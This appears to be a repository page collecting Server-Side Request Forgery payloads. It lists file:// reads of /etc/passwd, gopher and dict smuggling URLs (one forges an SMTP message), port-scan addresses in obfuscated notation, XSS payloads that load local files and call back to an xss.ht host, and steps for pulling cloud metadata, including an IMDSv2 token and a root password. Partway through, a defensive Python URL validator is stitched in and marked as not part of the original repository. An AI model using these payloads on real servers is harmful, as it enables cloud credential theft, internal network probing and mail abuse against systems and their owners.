
ssrfexploit's Introduction

Extract metadata, XSS, XSPA, RCE & LFI with SSRF (Server-Side Request Forgery)

LFI (Local File Inclusion)

  • file:///etc/passwd
  • file:///c:/windows/win.ini

Other protocols

  • dict://<server>:11111/
  • sftp://<server>:11111/
  • tftp://<server>:12346/TESTUDPPACKET
  • ftp://<server>:12346/TESTUDPPACKET
  • ldap://localhost:11211/%0astats%0aquit
  • gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
  • gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
  • gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

The gopher SMTP payload above will make a request like:

HELO localhost
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
From: [Hacker] <[email protected]>
To: <[email protected]>
Date: Tue, 15 Sep 2017 17:20:26 -0400

Subject: Ah Ah Ah

You didn't say the magic word !


.
QUIT

RCE (Remote Code Execution)

XSPA (Cross Site Port Attack, Internal Port Scan)

  • http://localhost:<port>
  • http://127.0.0.1:<port>
  • http://192.168.0.1:<port>
  • http://0177.0.0.1:<port>
  • http://2130706433:<port>
  • http://3232235521:<port>
  • http://3232235777:<port>

XSS (Cross-Site Scripting)

  • http://<yourxsshunter>.xss.ht

Host a file with these payloads & request it:

  • <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
  • <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
  • <script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
  • <img src onerror=document.write(navigator.appVersion)>
  • <img src onerror=document.write(navigator.appName)>
  • <img src onerror=document.write(navigator.platform)>
  • <img src onerror=document.write(navigator.userAgent)>
  • <img src onerror=document.write(navigator.plugins)>
  • <img src onerror=document.write(navigator.mimeTypes)>

Cloud metadata

AWS

From http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

ECS Task

From https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint-v2.html

Other notations

Shorteners

IPv6

  • http://[::ffff:169.254.169.254]
  • http://[0:0:0:0:0:ffff:169.254.169.254]
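A defensive counterpart to the lists above, added here and not part of the ssrfexploit repository: a validator for URLs that a server fetches on a user's behalf. It rejects the non-HTTP schemes from the Other protocols list, canonicalises the decimal, octal and hex host notations from the XSPA list together with the IPv4-mapped IPv6 forms just above, and refuses anything that resolves to loopback, private or link-local space (169.254.169.254 included). The function names and the injected `resolve` callable are my own choices; the DNS table used in the test is constructed.

```python
import ipaddress
from typing import Callable, Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # dict:, gopher:, file:, ftp:, ldap: are rejected outright

def parse_ipv4_loosely(host: str) -> Optional[ipaddress.IPv4Address]:
    # Canonicalise the inet_aton-style forms from the XSPA list (2130706433, 0177.0.0.1,
    # 3232235521, 0x7f.1): parts may be hex/octal/decimal, the last fills the remaining bytes.
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isascii() and p.isalnum() for p in parts):
        return None
    try:
        nums = [int(p[2:], 16) if p[:2].lower() == "0x" else
                int(p, 8) if len(p) > 1 and p[0] == "0" else int(p, 10) for p in parts]
    except ValueError:
        return None  # a hostname such as example.com lands here
    width = 8 * (5 - len(parts))
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= (1 << width):
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    return ipaddress.IPv4Address((value << width) | nums[-1])

def is_internal(ip) -> bool:
    # Loopback, RFC 1918, link-local (169.254.169.254), reserved, multicast, unspecified;
    # IPv4-mapped IPv6 such as ::ffff:169.254.169.254 is unwrapped before the check.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not ip.is_global or ip.is_private or ip.is_loopback or ip.is_link_local

def validate_outbound_url(url: str, resolve: Callable[[str], list]) -> tuple:
    # Returns (allowed, reason). `resolve` maps a hostname to address strings (wrap socket.getaddrinfo
    # in production). Re-run on every redirect hop and connect to the validated address, not a fresh DNS answer.
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:  # IPv4 in any notation, then IPv6 literal (urlsplit already strips the brackets)
        ip = parse_ipv4_loosely(host) or ipaddress.ip_address(host)
    except ValueError:
        ip = None
    addrs = [ip] if ip is not None else [ipaddress.ip_address(a) for a in resolve(host)]
    bad = [str(a) for a in addrs if is_internal(a)]
    if not addrs or bad:
        return False, f"{host} resolves to {bad or 'nothing'}"
    return True, "ok"
```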

AWS - Dirs

IMDSv2

If you can make a PUT request:

Send a PUT request to http://169.254.169.254/latest/api/token with the custom header x-aws-ec2-metadata-token-ttl-seconds set to the number of seconds the token should remain valid. Put the returned token in the header x-aws-ec2-metadata-token and retry the requests above.

Google Cloud

From https://cloud.google.com/compute/docs/metadata

Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"

Google allows recursive pulls

The beta endpoint does NOT require a header at the moment

Returns root password for Google

Digital Ocean

From https://developers.digitalocean.com/documentation/metadata/

Packetcloud

https://metadata.packet.net/userdata

Azure

From https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service

From https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service

Requires the header "Metadata: true"

OpenStack/RackSpace

From https://docs.openstack.org/nova/latest/user/metadata-service.html

HP Helion

Oracle Cloud

From https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.html

From https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htm

Alibaba

From https://www.alibabacloud.com/help/faq-detail/49122.htm

Tencent Cloud

From https://intl.cloud.tencent.com/document/product/213/4934

Kubernetes

From https://kubernetes.io/docs/tasks/debug-application-cluster/debug-service

ssrfexploit's People

Contributors

akincibor
